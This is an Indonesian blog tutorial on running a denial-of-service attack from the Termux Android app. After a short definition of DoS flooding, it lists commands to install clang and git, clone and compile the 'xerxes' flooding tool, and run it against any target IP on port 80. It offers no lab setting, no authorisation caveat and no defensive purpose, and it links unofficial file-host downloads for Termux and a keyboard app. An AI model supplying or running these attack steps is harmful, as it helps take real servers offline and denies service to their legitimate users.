Jumat, 27 Oktober 2017

Cara DDOS Di Aplikasi Termux

Cara DDOS Di Aplikasi Termux


Kali ini saya akan membagikan tutorial cara DDOS di aplikasi Termux. cukup mudah dan simple kok gk perlu waktu banyak. dan sebelum memberikan tutorial ini saya akan menjelaskan apa itu DDOS.

Apa itu DDOS???

Serangan DoS (bahasa Inggris: denial-of-service attacks') adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.
Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:
  • Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
  • Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.

oke siapkan bahannya dahulu, nih buat yg belum punya Termux http://upfile.mobi/kxHf5szcOjn

- apt-get install clang
*jika ada pilihan [y/n] pilih y lalu enter


- apt-get install git
*jika ada pilihan [y/n] pilih y lalu enter


- git clone https://github.com/zanyarjamal/xerxes


- cd xerxes
- clang xerxes.c -o xerxes


- ./xerxes ip target 80


- dan enter


* untuk berhenti bisa kalian tahan termux lalu akan muncul more pilih kill process atau kalian bisa menggunakan aplikasi hacker's Keyboard dengan cara Ctrl + C. link aplikasi Hacker's Keyboard http://upfile.mobi/Csk5Dk1u5iX


Oke sekian dari kami jangan lupa untuk tunggu tutorial selanjut nya. Wassalamualaikum Wr. WB.








PERLU DIKETAHUI


Iklan yang tampil pada halaman situs ini sepenuhnya sudah diatur oleh Pihak Google, kami hanya menyediakan tempat kosong khusus untuk iklan dari Google. Maka, apabila ada iklan yang dirasa kurang baik bagi anda sehingga tidak seharusnya ditampilkan, harap segera menginformasikan hal tersebut kepada kami dengan melalui Formulir Kontak yang ada di bagian bawah sendiri pada situs ini. Kemudian, kami akan segera menyampaikannya pada pihak Google terkait masalah tersebut.
Laporan dapat anda sertakan lampiran :
  • Nama Iklan
  • Alamat Screenshoot(Gambar) Iklan


Load Disqus Comments Hide Disqus Comments